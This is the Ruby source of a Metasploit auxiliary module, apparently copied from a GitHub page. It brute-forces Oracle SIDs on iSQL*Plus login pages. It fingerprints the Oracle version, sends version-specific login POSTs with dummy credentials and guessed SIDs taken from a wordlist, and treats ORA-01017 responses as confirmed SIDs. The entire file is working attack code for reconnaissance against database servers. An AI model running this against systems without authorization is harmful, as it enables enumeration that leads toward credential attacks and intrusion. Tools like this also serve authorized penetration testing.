/
isqlplus_sidbrute.rb
225 lines (204 loc) · 7.21 KB
/
isqlplus_sidbrute.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Oracle iSQLPlus SID Check',
'Description' => %q{
This module attempts to bruteforce the SID on the Oracle application server iSQL*Plus
login pages. It does this by testing Oracle error responses returned in the HTTP response.
Incorrect username/pass with a correct SID will produce an Oracle ORA-01017 error.
Works against Oracle 9.2, 10.1 & 10.2 iSQL*Plus. This module will attempt to
fingerprint the version and automatically select the correct POST request.
},
'References' =>
[
[ 'URL', 'https://blog.carnal0wnage.com/' ],
],
'Author' => [ 'CG', 'todb' ],
'License' => MSF_LICENSE
)
register_options([
Opt::RPORT(5560),
OptString.new('URI', [ true, 'Oracle iSQLPlus path', '/isqlplus/']),
OptString.new('SID', [ false, 'A single SID to test']),
OptPath.new('SIDFILE', [ false, 'A file containing a list of SIDs', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]),
OptInt.new('TIMEOUT', [false, 'Time to wait for HTTP responses', 30])
])
deregister_options(
"RHOST", "USERNAME", "PASSWORD", "USER_FILE", "PASS_FILE", "USERPASS_FILE",
"BLANK_PASSWORDS", "USER_AS_PASS", "REMOVE_USER_FILE", "REMOVE_PASS_FILE",
"BRUTEFORCE_SPEED" # Slow as heck anyway
)
end
def sid_file
datastore['SIDFILE']
end
def hostport
[target_host,rport].join(":")
end
def uri
datastore['URI'] || "/isqlplus/"
end
def timeout
(datastore['TIMEOUT'] || 30).to_i
end
def msg
msg = "#{hostport} - Oracle iSQL*Plus -"
end
def run_host(ip)
oracle_ver = get_oracle_version(ip)
if not check_oracle_version(oracle_ver)
print_error "#{msg} Unknown Oracle version, skipping."
return
end
begin
print_status("#{msg} Starting SID check")
sid_data.each do |sid|
guess = check_oracle_sid(ip,oracle_ver,sid)
return if guess and datastore['STOP_ON_SUCCESS']
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
print_error "#{msg} Cannot connect"
rescue ::Timeout::Error, ::Errno::EPIPE,Errno::ECONNRESET => e
print_error e.message
end
end
def get_oracle_version(ip)
begin
res = send_request_cgi({
'version' => '1.1',
'uri' => uri,
'method' => 'GET',
}, timeout)
oracle_ver = nil
if (res.nil?)
print_error("#{msg} no response")
elsif (res.code == 200)
print_status("#{msg} Received an HTTP #{res.code}")
oracle_ver = detect_oracle_version(res)
elsif (res.code == 404)
print_error("#{msg} Received an HTTP 404, check URIPATH")
elsif (res.code == 302)
print_error("#{msg} Received an HTTP 302 to #{res.headers['Location']}")
else
print_error("#{msg} Received an HTTP #{res.code}")
end
return oracle_ver
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
print_error "#{msg} Cannot connect"
end
end
def detect_oracle_version(res)
m = res.body.match(/iSQL\*Plus Release (9\.0|9\.1|9\.2|10\.1|10\.2)/)
oracle_ver = nil
oracle_ver = 10 if m[1] && m[1] =~ /10/
oracle_ver = m[1].to_f if m[1] && m[1] =~ /9\.[012]/
if oracle_ver
print_status("#{msg} Detected Oracle version #{oracle_ver}")
print_status("#{msg} SID detection for iSQL*Plus 10.1 may be unreliable") if oracle_ver == 10.1
else
print_error("#{msg} Unknown Oracle version detected.")
end
return oracle_ver
end
def check_oracle_version(ver)
[9.0,9.1,9.2,10].include? ver
end
def build_post_request(ver,sid)
post_request = nil
case ver
when 9.0
post_request = "action=logon&sqlcmd=&sqlparms=&username=scott&password=tiger&sid=#{sid.strip}&privilege=&Log+In=%B5%C7%C2%BC"
when 9.1
post_request = "action=logon&username=a&password=a&sid=#{sid.strip}&login=Login"
when 9.2
post_request = "action=logon&username=a&password=a&sid=#{sid.strip}&login=Login"
when 10
post_request = "username=a&password=a&connectID=#{sid.strip}&report=&script=&dynamic=&type=&action=&variables=&event=login"
end
return post_request
end
def parse_isqlplus_response(res,sid)
guess = false
if (res.nil?)
print_error("#{msg} No response")
elsif (res.code == 200)
if (res.body =~ /ORA-01017:/ or res.body =~ /ORA-28273:/)
if sid.nil? || sid.empty?
print_good("#{msg} Received ORA-01017 on a blank SID -- SIDs are not enforced upon login.")
else
print_good("#{msg} Received ORA-01017, probable correct SID '#{sid.strip}'")
end
guess = true
elsif (res.body =~ /(ORA-12170):/ or res.body =~ /(ORA-12154):/ or res.body =~ /(ORA-12162):/)
vprint_status("#{msg} Incorrect SID: '#{sid.strip}' (got error code #{$1})")
elsif res.body =~ /(ORA-12541):/
print_status("#{msg} Possible correct SID, but got ORA-12541: No Listener error.")
guess = true
else
print_status("#{msg} Received an unknown error") # Should say what the error was
end
elsif (res.code == 404)
print_status("#{msg} Received an HTTP 404, check URIPATH")
elsif (res.code == 302)
print_status("#{msg} Received an HTTP 302 redirect to #{res.headers['Location']}")
else
print_status("#{msg} Received an unexpected response: #{res.code}")
end
report_isqlplus_service(target_host,res) if res
return guess
end
def report_isqlplus_service(ip,res)
sname = datastore['SSL'] ? 'https' : 'http'
report_service(
:host => ip,
:proto => 'tcp',
:port => rport,
:name => sname,
:info => res.headers["Server"].to_s.strip
)
end
def report_oracle_sid(ip,sid)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => "oracle.sid",
:data => ((sid.nil? || sid.empty?) ? "*BLANK*" : sid),
:update => :unique_data
)
end
def sid_data
if datastore['SID'] and not datastore['SID'].empty?
[datastore['SID']]
elsif sid_file and ::File.readable? sid_file
::File.open(sid_file,"rb") {|f| f.read f.stat.size}.each_line.map {|x| x.strip.upcase}.uniq
else
raise ArugmentError, "Cannot read file '#{sid_file}'"
end
end
def check_oracle_sid(ip,oracle_ver,sid)
post_request = build_post_request(oracle_ver,sid)
vprint_status "#{msg} Trying SID '#{sid}', waiting for response..."
res = send_request_cgi({
'version' => '1.1',
'uri' => uri,
'method' => 'POST',
'data' => post_request,
'headers' =>
{
'Referer' => "http://#{ip}:#{rport}#{uri}"
}
}, timeout)
guess = parse_isqlplus_response(res,sid)
report_oracle_sid(ip,sid) if guess
return guess
end
end